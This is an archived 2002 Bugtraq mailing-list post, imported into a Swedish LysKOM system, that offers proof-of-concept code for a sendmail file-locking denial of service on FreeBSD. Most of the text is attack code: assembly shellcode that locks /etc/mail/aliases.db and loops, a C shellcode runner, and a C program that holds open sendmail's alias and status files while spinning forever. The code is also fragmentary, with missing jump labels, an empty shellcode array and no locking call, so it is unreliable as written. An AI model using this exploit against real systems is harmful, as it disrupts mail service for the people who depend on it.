8495352 2002-05-24 01:48 -0400  /14 rader/ KF <dotslash@snosoft.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-05-24  20:52  av Brevbäraren
Extern mottagare: bugtraq <bugtraq@securityfocus.org>
Extern mottagare: vuln-dev@security-focus.com
Mottagare: Bugtraq (import) <22389>
Ärende: Sendmail file locking - PoC
From: KF <dotslash@snosoft.com>
To: bugtraq <bugtraq@securityfocus.org>, vuln-dev@security-focus.com
Message-ID: <3CEDD441.3070504@snosoft.com>

A problem has been identified in sendmail that can result in a denial
of  service attack. Attached is proof of concept code for this issue.


have a safe Memorial Day folks.

(8495352) /KF <dotslash@snosoft.com>/-----(Ombruten)
Bilaga (text/plain) i text 8495354
Bilaga (text/plain) i text 8495355
Bilaga (text/plain) i text 8495356
8495354 2002-05-24 01:48 -0400  /40 rader/ KF <dotslash@snosoft.com>
Bilagans filnamn: "sendmail-DoS.S"
Importerad: 2002-05-24  20:52  av Brevbäraren
Extern mottagare: bugtraq <bugtraq@securityfocus.org>
Extern mottagare: vuln-dev@security-focus.com
Mottagare: Bugtraq (import) <22390>
Bilaga (text/plain) till text 8495352
Ärende: Bilaga (sendmail-DoS.S) till: Sendmail file locking - PoC
; Safemode.org, written by zillion 2002/05/24
; http://www.snosoft.com  : zillion@snosoft.com
; http://www.sendmail.org/LockingAdvisory.txt


jmp short       callit


pop             esi
xor             eax,eax
mov             [esi + 20],al
push            eax
push            esi
mov             al,5
push            eax
int             0x80

push byte       0x2
push            eax
mov             al,131
push            eax
int             0x80

; Where going to stay forever ;-)

sub             cl,0x3
js              l00p

call            doit

db              '/etc/mail/aliases.db'
(8495354) /KF <dotslash@snosoft.com>/---------------
8495355 2002-05-24 01:48 -0400  /24 rader/ KF <dotslash@snosoft.com>
Bilagans filnamn: "sendmail-DoS.c"
Importerad: 2002-05-24  20:52  av Brevbäraren
Extern mottagare: bugtraq <bugtraq@securityfocus.org>
Extern mottagare: vuln-dev@security-focus.com
Mottagare: Bugtraq (import) <22391>
Bilaga (text/plain) till text 8495352
Ärende: Bilaga (sendmail-DoS.c) till: Sendmail file locking - PoC

FreeBSD Sendmail DoS shellcode that locks /etc/mail/aliases.db
Written by zillion (at http://www.safemode.org &&

More info: http://www.sendmail.org/LockingAdvisory.txt


char shellcode[] =

int main()
  int *ret;
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
(8495355) /KF <dotslash@snosoft.com>/-----(Ombruten)
8495356 2002-05-24 01:48 -0400  /42 rader/ KF <dotslash@snosoft.com>
Bilagans filnamn: "sendmail-filelock-dos.c"
Importerad: 2002-05-24  20:52  av Brevbäraren
Extern mottagare: bugtraq <bugtraq@securityfocus.org>
Extern mottagare: vuln-dev@security-focus.com
Mottagare: Bugtraq (import) <22392>
Bilaga (text/plain) till text 8495352
Ärende: Bilaga (sendmail-filelock-dos.c) till: Sendmail file locking - PoC
#include <fcntl.h>
#include <unistd.h>


Stupid piece of code to test the sendmail lock vulnerability on 
FreeBSD. Run this and try sendmail -t on FreeBSD for example.

More info: http://www.sendmail.org/LockingAdvisory.txt

zillion (at safemode.org && snosoft.com)


int main() {

  if(fork() == 0) {

    char *lock1 = "/etc/mail/aliases";
    char *lock2 = "/etc/mail/aliases.db";
    char *lock3 = "/var/log/sendmail.st";

    int fd;
    fd = open(lock1,O_RDONLY);

    fd = open(lock2,O_RDONLY);

    fd = open(lock3,O_RDONLY);

    /* We are here to stay! */

    for(;;) {}

(8495356) /KF <dotslash@snosoft.com>/---------------